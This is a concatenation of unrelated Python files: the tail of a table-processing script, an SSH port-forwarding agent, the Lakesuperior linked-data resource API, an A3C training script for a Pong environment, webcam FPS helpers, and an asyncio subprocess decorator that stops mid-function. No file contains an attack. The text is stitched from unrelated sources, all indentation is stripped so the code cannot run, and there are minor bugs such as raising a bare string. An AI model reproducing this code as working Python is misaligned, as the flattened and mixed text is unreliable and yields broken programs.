TABLE_PROJECT_SPACE = DEV_TABLE_PROJECT_SPACE
S_YWGZ_GZMX = 'S_YWGZ_GZMX'  # rule table
S_RWGL_ZXJG = 'S_RWGL_ZXJG_NEW_1'  # task execution result table
if __name__ == '__main__':
options.tunnel.use_instance_tunnel = True
options.tunnel.limit_instance_tunnel = False
options.connect_timeout = 300
options.read_timeout = 240
max_threads_num = 5  # maximum number of concurrent threads
main(max_threads_num)
|
ssh_remote_port.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
##############################################################################
#
# Acrisel LTD
# Copyright (C) 2008- Acrisel (acrisel.com) . All Rights Reserved
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import logging
from sshpipe.sshpipe import SSHPipe
from sshpipe.pipe_listener import pipe_listener_forever, EXIT_MESSAGE
import multiprocessing as mp
module_logger = logging.getLogger(__name__)
def remote_socket_agent(port, exit_message=EXIT_MESSAGE, pickle_loads=False, imports=None):
''' Forward SSH messages to port
'''
global module_logger
controlq = mp.Queue()
kwargs = {'queue':controlq, 'port':port, 'exit_message':exit_message, 'pickle_loads': pickle_loads, 'imports':imports, 'logger': module_logger,}
listener = mp.Process(target=pipe_listener_forever, kwargs=kwargs, daemon=True)
listener.start()
active = True
while active:
msg = controlq.get()
active = msg != EXIT_MESSAGE
class SSHRemotePort(SSHPipe):
''' Facilitates sending information to remote host:port via ssh channel
'''
def __init__(self, host, port, pack=False, exit_message=None, imports=None, logger=None, *args, **kwargs):
self.host = host
self.port = port
self.pack = pack
cmd_parts= ["ssh_remote_port.py --port {}".format(port)]
if imports:
cmd_parts.append("--imports {}".format(imports))
if pack:
cmd_parts.append("--pickle-loads")
if exit_message:
cmd_parts.append("--exit-message {}".format(exit_message))
command = ' '.join(cmd_parts)
super(SSHRemotePort, self).__init__(self.host, command, *args, logger=logger, **kwargs)
def start(self):
super(SSHRemotePort, self).start(wait=0.2)
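# Usage sketch (host and port are placeholders; how messages are actually written to the
# pipe depends on the SSHPipe base class, which is not shown here):
#     agent = SSHRemotePort('worker01', 5555, pack=True, imports='myproject.messages')
#     agent.start()
# start() launches "ssh_remote_port.py --port 5555 --imports myproject.messages --pickle-loads"
# on the remote host, which unpickles each incoming message and forwards it to local port 5555.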
def cmdargs():
import argparse
import os
filename = os.path.basename(__file__)
progname = filename.rpartition('.')[0]
parser = argparse.ArgumentParser(description="%s runs SSH Port Agent" % progname)
parser.add_argument('--port', type=int,
help="""Port to forward messages to.""")
parser.add_argument('--exit-message', type=str, dest='exit_message', default=EXIT_MESSAGE,
help="""string to use as exit message, default: {}.""".format(EXIT_MESSAGE))
parser.add_argument('--pickle-loads', action='store_true', default=False, dest='pickle_loads',
help='if set, will pickle.loads() message before sending to port.')
parser.add_argument('--imports', type=str, required=False, dest='imports', nargs='*',
help="""import module before pickle loads.""")
args = parser.parse_args()
return args
if __name__ == '__main__':
mp.freeze_support()
mp.set_start_method('spawn')
args = cmdargs()
remote_socket_agent(args.port, exit_message=args.exit_message,
                    pickle_loads=args.pickle_loads, imports=args.imports)
|
resource.py | import logging
from functools import wraps
from itertools import groupby
from multiprocessing import Process
from threading import Lock, Thread
import arrow
from rdflib import Literal
from rdflib.namespace import XSD
from lakesuperior.config_parser import config
from lakesuperior.dictionaries.namespaces import ns_collection as nsc
from lakesuperior.exceptions import (
InvalidResourceError, ResourceNotExistsError, TombstoneError)
from lakesuperior import env, thread_env
from lakesuperior.globals import RES_DELETED, RES_UPDATED
from lakesuperior.model.ldp.ldp_factory import LDP_NR_TYPE, LdpFactory
from lakesuperior.model.ldp.ldpr import Ldpr
from lakesuperior.util.toolbox import rel_uri_to_urn
logger = logging.getLogger(__name__)
__doc__ = """
Primary API for resource manipulation.
Quickstart::
>>> # First import default configuration and globals—only done once.
>>> import lakesuperior.default_env
>>> from lakesuperior.api import resource
>>> # Get root resource.
>>> rsrc = resource.get('/')
>>> # Dump graph.
>>> with rsrc.imr.store.txn_ctx():
>>> print({*rsrc.imr.as_rdflib()})
{(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://purl.org/dc/terms/title'),
rdflib.term.Literal('Repository Root')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/fcrepo#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/fcrepo#RepositoryRoot')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://fedora.info/definitions/fcrepo#Resource')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#BasicContainer')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#Container')),
(rdflib.term.URIRef('info:fcres/'),
rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
rdflib.term.URIRef('http://www.w3.org/ns/ldp#RDFSource'))}
"""
def transaction(write=False):
"""
Handle atomic operations in a store.
This wrapper ensures that a write operation is performed atomically. It
also takes care of sending a message for each resource changed in the
transaction.
ALL write operations on the LDP-RS and LDP-NR stores go through this
wrapper.
"""
def _transaction_deco(fn):
@wraps(fn)
def _wrapper(*args, **kwargs):
# Mark transaction begin timestamp. This is used for create and
# update timestamps on resources.
thread_env.timestamp = arrow.utcnow()
thread_env.timestamp_term = Literal(
thread_env.timestamp, datatype=XSD.dateTime)
with env.app_globals.rdf_store.txn_ctx(write):
ret = fn(*args, **kwargs)
if len(env.app_globals.changelog):
job = Thread(target=_process_queue)
job.start()
delattr(thread_env, 'timestamp')
delattr(thread_env, 'timestamp_term')
return ret
return _wrapper
return _transaction_deco
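# Usage sketch: the API functions below opt into the wrapper like this (the decorator is
# read-only by default; pass True for write operations):
#
#     @transaction(True)
#     def my_write_api(uid):
#         ...  # runs inside one store transaction; changelog messages are sent
#              # from a worker thread after the wrapped call returns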
def _process_queue():
"""
Process the message queue on a separate thread.
"""
lock = Lock()
lock.acquire()
while len(env.app_globals.changelog):
_send_event_msg(*env.app_globals.changelog.popleft())
lock.release()
def _send_event_msg(remove_trp, add_trp, metadata):
"""
Send messages about a changed LDPR.
A single LDPR message packet can contain multiple resource subjects, e.g.
if the resource graph contains hash URIs or even other subjects. This
method groups triples by subject and sends a message for each of the
subjects found.
"""
# Group delta triples by subject.
remove_grp = groupby(remove_trp, lambda x : x[0])
remove_dict = {k[0]: k[1] for k in remove_grp}
add_grp = groupby(add_trp, lambda x : x[0])
add_dict = {k[0]: k[1] for k in add_grp}
subjects = set(remove_dict.keys()) | set(add_dict.keys())
for rsrc_uri in subjects:
logger.debug('Processing event for subject: {}'.format(rsrc_uri))
env.app_globals.messenger.send(rsrc_uri, **metadata)
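# Worked example (hypothetical triples): given
#     remove_trp = [(s1, p1, o1), (s1, p2, o2), (s2, p1, o3)]
# groupby(remove_trp, lambda x: x[0]) yields (s1, <group>), (s2, <group>), so remove_dict
# becomes {s1: <group>, s2: <group>} and only its keys feed the `subjects` set above.
# itertools.groupby only merges *consecutive* equal keys, so triples for the same subject
# are assumed to arrive adjacent in the changelog entry.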
### API METHODS ###
@transaction()
def exists(uid):
"""
Return whether a resource exists (is stored) in the repository.
:param string uid: Resource UID.
"""
try:
exists = LdpFactory.from_stored(uid).is_stored
except ResourceNotExistsError:
exists = False
return exists
@transaction()
def get_metadata(uid):
"""
Get metadata (admin triples) of an LDPR resource.
:param string uid: Resource UID.
"""
return LdpFactory.from_stored(uid).metadata
@transaction()
def get(uid, repr_options={}):
"""
Get an LDPR resource.
The resource comes preloaded with user data and metadata as indicated by
the `repr_options` argument. Any further handling of this resource is done
outside of a transaction.
:param string uid: Resource UID.
:param repr_options: (dict(bool)) Representation options. This is a dict
that is unpacked downstream in the process. The default empty dict
results in default values. The accepted dict keys are:
- incl_inbound: include inbound references. Default: False.
- incl_children: include children URIs. Default: True.
- embed_children: Embed full graph of all child resources. Default: False
"""
rsrc = LdpFactory.from_stored(uid, repr_opts=repr_options)
# Load graph before leaving the transaction.
rsrc.imr
return rsrc
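# Usage sketch (the UID is a placeholder; the txn_ctx pattern follows the module Quickstart):
#     rsrc = get('/my-container/child', repr_options={
#         'incl_inbound': False, 'incl_children': True, 'embed_children': False})
#     with rsrc.imr.store.txn_ctx():
#         print({*rsrc.imr.as_rdflib()})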
@transaction()
def get_version_info(uid):
"""
Get version metadata (fcr:versions).
"""
return LdpFactory.from_stored(uid).version_info
@transaction()
def get_version(uid, ver_uid):
"""
Get a specific version of a resource.
"""
return LdpFactory.from_stored(uid).get_version(ver_uid)
@transaction(True)
def create(parent, slug=None, **kwargs):
r"""
Mint a new UID and create a resource.
The UID is computed from a given parent UID and a "slug", a proposed path
relative to the parent. The application will attempt to use the suggested
path but it may use a different one if a conflict with an existing resource
arises.
:param str parent: UID of the parent resource.
:param str slug: Tentative path relative to the parent UID.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp.ldp_factory.LdpFactory.from_provided`
method.
:rtype: lakesuperior.model.ldp.ldpr.Ldpr
:return: The newly created resource.
"""
uid = LdpFactory.mint_uid(parent, slug)
logger.debug('Minted UID for new resource: {}'.format(uid))
rsrc = LdpFactory.from_provided(uid, **kwargs)
rsrc.create_or_replace(create_only=True)
return rsrc
@transaction(True)
def create_or_replace(uid, **kwargs):
r"""
Create or replace a resource with a specified UID.
:param string uid: UID of the resource to be created or updated.
:param \*\*kwargs: Other parameters are passed to the
:py:meth:`~lakesuperior.model.ldp.ldp_factory.LdpFactory.from_provided`
method.
:rtype: tuple(str, lakesuperior.model.ldp.ldpr.Ldpr)
:return: A tuple of:
1. Event type (str): whether the resource was created or updated.
2. Resource (lakesuperior.model.ldp.ldpr.Ldpr): The new or updated
resource.
"""
rsrc = LdpFactory.from_provided(uid, **kwargs)
return rsrc.create_or_replace(), rsrc
@transaction(True)
def update(uid, update_str, is_metadata=False, handling='strict'):
"""
Update a resource with a SPARQL-Update string.
:param string uid: Resource UID.
:param string update_str: SPARQL-Update statements.
:param bool is_metadata: Whether the resource metadata are being updated.
:param str handling: How to handle server-managed triples. ``strict``
(the default) rejects the update with an exception if server-managed
triples are being changed. ``lenient`` modifies the update graph so
offending triples are removed and the update can be applied.
:raise InvalidResourceError: If ``is_metadata`` is False and the resource
being updated is a LDP-NR.
"""
rsrc = LdpFactory.from_stored(uid, handling=handling)
if LDP_NR_TYPE in rsrc.ldp_types and not is_metadata:
raise InvalidResourceError(
'Cannot use this method to update an LDP-NR content.')
delta = rsrc.sparql_delta(update_str)
rsrc.modify(RES_UPDATED, *delta)
return rsrc
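# Usage sketch (UID and SPARQL payload are placeholders):
#     update('/my-container/child',
#            'DELETE {} INSERT {<> <http://purl.org/dc/terms/title> "New title" .} WHERE {}',
#            handling='lenient')  # drop offending server-managed triples instead of raising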
@transaction(True)
def update_delta(uid, remove_trp, add_trp):
"""
Update a resource graph (LDP-RS or LDP-NR) with sets of add/remove triples.
A set of triples to add and/or a set of triples to remove may be provided.
:param string uid: Resource UID.
:param set(tuple(rdflib.term.Identifier)) remove_trp: Triples to
remove, as 3-tuples of RDFLib terms.
:param set(tuple(rdflib.term.Identifier)) add_trp: Triples to
add, as 3-tuples of RDFLib terms.
"""
rsrc = LdpFactory.from_stored(uid)
# FIXME Wrong place to put this, should be at the LDP level.
remove_trp = {
(rel_uri_to_urn(s, uid), p, rel_uri_to_urn(o, uid))
for s, p, o in remove_trp
}
add_trp = {
(rel_uri_to_urn(s, uid), p, rel_uri_to_urn(o, uid))
for s, p, o in add_trp
}
remove_trp = rsrc.check_mgd_terms(remove_trp)
add_trp = rsrc.check_mgd_terms(add_trp)
return rsrc.modify(RES_UPDATED, remove_trp, add_trp)
@transaction(True)
def create_version(uid, ver_uid):
"""
Create a resource version.
:param string uid: Resource UID.
:param string ver_uid: Version UID to be appended to the resource URI.
NOTE: this is a "slug", i.e. the version URI is not guaranteed to be the
one indicated.
:rtype: str
:return: Version UID.
"""
return LdpFactory.from_stored(uid).create_version(ver_uid)
@transaction(True)
def delete(uid, soft=True, inbound=True):
"""
Delete a resource.
:param string uid: Resource UID.
:param bool soft: Whether to perform a soft-delete and leave a
tombstone resource, or wipe any memory of the resource.
:param bool inbound: Whether to also remove references to the resource held
    by other resources; forced to True when referential integrity is enforced.
"""
# If referential integrity is enforced, grab all inbound relationships
# to break them.
refint = env.app_globals.rdfly.config['referential_integrity']
inbound = True if refint else inbound
if soft:
repr_opts = {'incl_inbound' : True} if inbound else {}
rsrc = LdpFactory.from_stored(uid, repr_opts)
return rsrc.bury(inbound)
else:
Ldpr.forget(uid, inbound)
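# Usage sketch (UID is a placeholder):
#     delete('/my-container/child')              # soft-delete: leaves a tombstone
#     delete('/my-container/child', soft=False)  # hard-delete: wipes the resource
# A soft-deleted resource can later be reinstated with resurrect(uid).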
@transaction(True)
def revert_to_version(uid, ver_uid):
"""
Restore a resource to a previous version state.
:param str uid: Resource UID.
:param str ver_uid: Version UID.
"""
return LdpFactory.from_stored(uid).revert_to_version(ver_uid)
@transaction(True)
def resurrect(uid):
"""
Reinstate a buried (soft-deleted) resource.
:param str uid: Resource UID.
"""
try:
rsrc = LdpFactory.from_stored(uid)
except TombstoneError as e:
if e.uid != uid:
raise
else:
return LdpFactory.from_stored(uid, strict=False).resurrect()
else:
raise InvalidResourceError(
uid, msg='Resource {} is not dead.'.format(uid))
|
a3c_tryout_2.py | # Baby Advantage Actor-Critic | Sam Greydanus | October 2017 | MIT License
from __future__ import print_function
import torch, os, gym, time, glob, argparse, sys
import numpy as np
from scipy.signal import lfilter
# from scipy.misc import imresize # preserves single-pixel info _unlike_ img = img[::2,::2]
from collections import deque
import torch.nn as nn
import torch.nn.functional as F
import torch.multiprocessing as mp
import wimblepong
import cv2
os.environ['OMP_NUM_THREADS'] = '1'
def get_args():
parser = argparse.ArgumentParser(description=None)
parser.add_argument('--env', default='Breakout-v4', type=str, help='gym environment')
parser.add_argument('--processes', default=20, type=int, help='number of processes to train with')
parser.add_argument('--render', default=False, type=bool, help='renders the atari environment')
parser.add_argument('--test', default=False, type=bool, help='sets lr=0, chooses most likely actions')
parser.add_argument('--rnn_steps', default=20, type=int, help='steps to train LSTM over')
parser.add_argument('--lr', default=1e-4, type=float, help='learning rate')
parser.add_argument('--seed', default=1, type=int, help='seed random # generators (for reproducibility)')
parser.add_argument('--gamma', default=0.99, type=float, help='rewards discount factor')
parser.add_argument('--tau', default=1.00, type=float, help='generalized advantage estimation discount')
parser.add_argument('--horizon', default=0.99, type=float, help='horizon for running averages')
parser.add_argument('--hidden', default=256, type=int, help='hidden size of GRU')
return parser.parse_args()
discount = lambda x, gamma: lfilter([1],[1,-gamma],x[::-1])[::-1] # discounted rewards one liner
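# Worked example: discount([1., 1., 1.], 0.9) gives (up to float rounding)
# [2.71, 1.9, 1.], i.e. each entry is r_t + gamma*r_{t+1} + gamma^2*r_{t+2} + ...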
def prepro(obs, target_reso=(40, 40)):
# print('here lol')
return np.dot(cv2.resize(obs[...,:3], dsize=target_reso), \
[0.2989, 0.5870, 0.1140]).astype('float32')/255.0
def printlog(args, s, end='\n', mode='a'):
print(s, end=end) ; f=open(args.save_dir+'log.txt',mode) ; f.write(s+'\n') ; f.close()
class NNPolicy(nn.Module): # an actor-critic neural network
def __init__(self, channels, memsize, num_actions):
super(NNPolicy, self).__init__()
self.conv1 = nn.Conv2d(channels, 32, 3, stride=2, padding=1)
self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.gru = nn.GRUCell(32 * 3 * 3, memsize)
self.critic_linear, self.actor_linear = nn.Linear(memsize, 1), nn.Linear(memsize, num_actions)
def forward(self, inputs, train=True, hard=False):
inputs, hx = inputs
# inputs = inputs.view(-1, 1, 80-)
x = F.elu(self.conv1(inputs))
x = F.elu(self.conv2(x))
x = F.elu(self.conv3(x))
x = F.elu(self.conv4(x))
# print(x.shape)
hx = self.gru(x.view(-1, 32 * 3 * 3), (hx))
return self.critic_linear(hx), self.actor_linear(hx), hx
def try_load(self, save_dir):
paths = glob.glob(save_dir + '*.tar') ; step = 0
if len(paths) > 0:
ckpts = [int(s.split('.')[-2]) for s in paths]
ix = np.argmax(ckpts) ; step = ckpts[ix]
self.load_state_dict(torch.load(paths[ix]))
print("\tno saved models") if step is 0 else print("\tloaded model: {}".format(paths[ix]))
return step
class SharedAdam(torch.optim.Adam): # extend a pytorch optimizer so it shares grads across processes
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
super(SharedAdam, self).__init__(params, lr, betas, eps, weight_decay)
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
state['shared_steps'], state['step'] = torch.zeros(1).share_memory_(), 0
state['exp_avg'] = p.data.new().resize_as_(p.data).zero_().share_memory_()
state['exp_avg_sq'] = p.data.new().resize_as_(p.data).zero_().share_memory_()
def step(self, closure=None):
for group in self.param_groups:
for p in group['params']:
if p.grad is None: continue
self.state[p]['shared_steps'] += 1
self.state[p]['step'] = self.state[p]['shared_steps'][0] - 1 # a "step += 1" comes later
super(SharedAdam, self).step(closure)
def cost_func(args, values, logps, actions, rewards):
np_values = values.view(-1).data.numpy()
# generalized advantage estimation using \delta_t residuals (a policy gradient method)
delta_t = np.asarray(rewards) + args.gamma * np_values[1:] - np_values[:-1]
logpys = logps.gather(1, actions.clone().detach().view(-1,1))
gen_adv_est = discount(delta_t, args.gamma * args.tau)
policy_loss = -(logpys.view(-1) * torch.FloatTensor(gen_adv_est.copy())).sum()
# l2 loss over value estimator
rewards[-1] += args.gamma * np_values[-1]
discounted_r = discount(np.asarray(rewards), args.gamma)
discounted_r = torch.tensor(discounted_r.copy(), dtype=torch.float32)
value_loss = .5 * (discounted_r - values[:-1,0]).pow(2).sum()
entropy_loss = (-logps * torch.exp(logps)).sum() # entropy definition, for entropy regularization
return policy_loss + 0.5 * value_loss - 0.01 * entropy_loss
def train(shared_model, shared_optimizer, rank, args, info):
if rank == 1: from tensorboardX import SummaryWriter
env = gym.make("WimblepongVisualMultiplayer-v0")
env.seed(args.seed + rank) ; torch.manual_seed(args.seed + rank) # seed everything
model = NNPolicy(channels=1, memsize=args.hidden, num_actions=args.num_actions) # a local/unshared model
state, state2 = env.reset()
state, state2 = torch.tensor(prepro(state)), torch.tensor(prepro(state2))
opponent_id = 2
opponent = wimblepong.SimpleAi(env, opponent_id)
use_simpleAI = True
if rank == 1: writer = SummaryWriter()
running_winrate = deque([0 for i in range(100)], maxlen=100)
start_time = last_disp_time = time.time()
episode_length, epr, eploss, done = 0, 0, 0, True # bookkeeping
if rank == 1: episode_number = 0
while info['frames'][0] <= 8e7 or args.test: # openai baselines uses 40M frames...we'll use 80M
model.load_state_dict(shared_model.state_dict()) # sync with shared model
hx = torch.zeros(1, 256) if done else hx.detach() # rnn activation vector
hx_ = torch.zeros(1, 256) if done else hx_.detach() # rnn activation vector
values, logps, actions, rewards = [], [], [], [] # save values for computing gradients
##done = False
for step in range(args.rnn_steps):
# print(state.view(1,1,40,40))
# Step the environment and get the rewards and new observations
# (ob1, ob2), (rew1, rew2), done, info = env.step((action1, action2))
action_ = opponent.get_action()
if not use_simpleAI:
with torch.no_grad():
value_, logit_, hx_ = model((state2.view(1,1,40,40), hx_))
logp_ = F.log_softmax(logit_, dim=-1)
action_ = torch.exp(logp_).multinomial(num_samples=1).data[0]#logp.max(1)[1].data if args.test else
action_ = action_.numpy()[0]
# print(type(state))
value, logit, hx = model((state.view(1,1,40,40), hx))
logp = F.log_softmax(logit, dim=-1)
action = torch.exp(logp).multinomial(num_samples=1).data[0]#logp.max(1)[1].data if args.test else
# state, reward, done, _ = env.step(action.numpy()[0])
(state, state2), (reward, reward2), done, _ = env.step((action.numpy()[0], action_))
if args.render: env.render()
state = torch.tensor(prepro(state)) ; epr += reward
if not use_simpleAI: state2 = torch.tensor(prepro(state2))
# reward = np.clip(reward, -1, 1) # reward
done = done or episode_length >= 1e4 # don't let a single episode run for too long
info['frames'].add_(1) ; num_frames = int(info['frames'].item())
if num_frames % 2e6 == 0: # save every 2M frames
printlog(args, '\n\t{:.0f}M frames: saved model\n'.format(num_frames/1e6))
torch.save(shared_model.state_dict(), args.save_dir+'model.{:.0f}.tar'.format(num_frames/1e6))
if done: # update shared data
if reward == 10:
running_winrate.append(1)
else:
running_winrate.append(0)
strong_ai_prob = np.sum(running_winrate)/len(running_winrate)
# use_simpleAI = torch.rand(1).item() >= strong_ai_prob
use_simpleAI = strong_ai_prob <= 0.9
if rank == 1: writer.add_scalar('winrate', strong_ai_prob, episode_number)
if rank == 1: episode_number += 1
info['episodes'] += 1
interp = 1 if info['episodes'][0] == 1 else 1 - args.horizon
info['run_epr'].mul_(1-interp).add_(interp * epr)
info['run_loss'].mul_(1-interp).add_(interp * eploss)
if rank == 0 and time.time() - last_disp_time > 60: # print info ~ every minute
elapsed = time.strftime("%Hh %Mm %Ss", time.gmtime(time.time() - start_time))
printlog(args, 'time {}, episodes {:.0f}, frames {:.1f}M, mean epr {:.2f}, run loss {:.2f}'
.format(elapsed, info['episodes'].item(), num_frames/1e6,
info['run_epr'].item(), info['run_loss'].item()))
last_disp_time = time.time()
if done: # maybe print info.
hx = torch.zeros(1, 256)
hx_ = torch.zeros(1, 256)
episode_length, epr, eploss = 0, 0, 0
state, state2 = env.reset()
state = torch.tensor(prepro(state))
if not use_simpleAI:
state2 = torch.tensor(prepro(state2))
values.append(value) ; logps.append(logp) ; actions.append(action) ; rewards.append(reward)
# print(state.shape)
next_value = torch.zeros(1,1) if done else model((state.view(-1, 1, 40, 40), hx))[0]
values.append(next_value.detach())
loss = cost_func(args, torch.cat(values), torch.cat(logps), torch.cat(actions), np.asarray(rewards))
eploss += loss.item()
shared_optimizer.zero_grad() ; loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 40)
for param, shared_param in zip(model.parameters(), shared_model.parameters()):
if shared_param.grad is None: shared_param._grad = param.grad # sync gradients with shared model
shared_optimizer.step()
if rank == 1: writer.close()
if __name__ == "__main__":
if sys.version_info[0] > 2:
mp.set_start_method('spawn') # this must not be in global scope
elif sys.platform == 'linux' or sys.platform == 'linux2':
raise "Must be using Python 3 with linux!" # or else you get a deadlock in conv2d
args = get_args()
args.save_dir = '{}/'.format(args.env.lower()) # keep the directory structure simple
if args.render: args.processes = 1 ; args.test = True # render mode -> test mode w one process
if args.test: args.lr = 0 # don't train in render mode
args.num_actions = gym.make('WimblepongVisualSimpleAI-v0').action_space.n # get the action space of this game
os.makedirs(args.save_dir) if not os.path.exists(args.save_dir) else None # make dir to save models etc.
torch.manual_seed(args.seed)
shared_model = NNPolicy(channels=1, memsize=args.hidden, num_actions=args.num_actions).share_memory()
shared_optimizer = SharedAdam(shared_model.parameters(), lr=args.lr)
info = {k: torch.DoubleTensor([0]).share_memory_() for k in ['run_epr', 'run_loss', 'episodes', 'frames']}
# CHANGE THIS: temporary hack, loads checkpoints from args.env instead of args.save_dir
info['frames'] += shared_model.try_load(args.env) * 1e6
if int(info['frames'].item()) == 0: printlog(args,'', end='', mode='w') # clear log file
processes = []
for rank in range(args.processes):
p = mp.Process(target=train, args=(shared_model, shared_optimizer, rank, args, info))
p.start() ; processes.append(p)
for p in processes: p.join()
|
utils.py | # From http://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
import cv2
import datetime
from threading import Thread
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True |
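# Usage sketch (device index and frame size are placeholders):
#     vs = WebcamVideoStream(src=0, width=640, height=480).start()
#     fps = FPS().start()
#     for _ in range(100):
#         frame = vs.read()   # returns the most recently grabbed frame without blocking
#         fps.update()
#     fps.stop()
#     vs.stop()
#     print("approx. FPS: {:.2f}".format(fps.fps()))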
concurrent.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File : Ampel-core/ampel/util/concurrent.py
# License : BSD-3-Clause
# Author : Jakob van Santen <jakob.van.santen@desy.de>
# Date : 07.08.2020
# Last Modified Date: 07.08.2020
# Last Modified By : Jakob van Santen <jakob.van.santen@desy.de>
"""
Simple decorator for running a function in subprocess with asyncio, adapted
from pebble.concurrent.process. Like pebble, the future returned by the
decorated function can be cancelled to terminate the underlying subprocess.
Unlike pebble (or concurrent.futures.ProcessPoolExecutor), no extra Python
threads are needed to manage the process lifecycle.
"""
import asyncio, io, itertools, os, signal, sys, traceback
from typing import Any, Dict, Set
from functools import wraps, partial
from multiprocessing import reduction, spawn # type: ignore
from multiprocessing.context import set_spawning_popen
from subprocess import _args_from_interpreter_flags # type: ignore
import ampel.vendor.aiopipe as aiopipe # type: ignore
from ampel.metrics.prometheus import prometheus_cleanup_worker, prometheus_setup_worker
def process(function=None, **kwargs):
"""
Runs the decorated function in a concurrent process. All arguments and
return values must be pickleable.
The decorated function will return an asyncio.Task that can be awaited in
an event loop. The task will complete when the function returns or raises
an exception. If the task is cancelled, the process will be terminated.
"""
if function is None:
return partial(_process_wrapper, **kwargs)
else:
return _process_wrapper(function)
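# Usage sketch (function name and arguments are placeholders; arguments and return
# values must be pickleable, per the docstring above):
#
#     @process(timeout=5.0)
#     def crunch(x, y):
#         return x + y
#
#     async def main():
#         task = crunch(1, 2)   # asyncio.Task wrapping the subprocess
#         print(await task)     # -> 3; task.cancel() would terminate the child process
#
#     # asyncio.run(main())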
class RemoteTraceback(Exception):
"""Traceback wrapper for exceptions in remote process.
Exception.__cause__ requires a BaseException subclass.
"""
def __init__(self, traceback):
self.traceback = traceback
def __str__(self):
return self.traceback
class RemoteException(BaseException):
"""Pickling wrapper for exceptions in remote process."""
def __init__(self, exception, traceback):
self.exception = exception
self.traceback = traceback
def __reduce__(self):
return rebuild_exception, (self.exception, self.traceback)
def rebuild_exception(exception, traceback):
exception.__cause__ = RemoteTraceback(traceback)
return exception
def prepare(data):
"stripped-down version of multiprocessing.spawn.prepare()"
if "sys_path" in data:
sys.path = data["sys_path"]
if "sys_argv" in data:
sys.argv = data["sys_argv"]
if "dir" in data:
os.chdir(data["dir"])
if "init_main_from_name" in data:
spawn._fixup_main_from_name(data["init_main_from_name"])
elif "init_main_from_path" in data:
spawn._fixup_main_from_path(data["init_main_from_path"])
if "process_name" in data:
prometheus_setup_worker({"process": data["process_name"]})
def spawn_main(read_fd, write_fd):
"""
Execute pickled _Process received over pipe
"""
with open(read_fd, "rb") as rx:
preparation_data = reduction.pickle.load(rx)
prepare(preparation_data)
obj = reduction.pickle.load(rx)
ret = None
exitcode = 1
try:
ret = obj()
exitcode = 0
payload = reduction.pickle.dumps(ret)
except Exception as error:
error.traceback = traceback.format_exc()
ret = RemoteException(error, error.traceback)
payload = reduction.pickle.dumps(ret)
try:
with open(write_fd, "wb") as tx:
tx.write(payload)
except Exception:
print(f"Process {obj._name} (pid {os.getpid()}):", file=sys.stderr)
traceback.print_exc(file=sys.stderr)
exitcode = 1
sys.exit(exitcode)
class _Process:
_counter = itertools.count(1)
#: PIDs for active processes, name -> (replica -> pid), used by AmpelProcessCollector
_active: Dict[str, Dict[int, int]] = {}
#: Replica ids that can be recycled
_expired: Dict[str, Set[int]] = {}
def __init__(self, target=None, name=None, timeout=3.0, args=(), kwargs={}):
self._target = target
count = next(self._counter)
# infer the process name from a ProcessModel-like dict
if name is None:
for arg in args:
if isinstance(arg, dict) and "name" in arg:
self._name = arg["name"]
break
else:
self._name = f"{count}"
else:
self._name = name
self._timeout = timeout
self._args = tuple(args)
self._kwargs = dict(kwargs)
def __call__(self):
if self._target:
return self._target(*self._args, **self._kwargs)
def _get_command_line(self, read_fd, write_fd):
return (
spawn.get_executable(),
*_args_from_interpreter_flags(),
"-c",
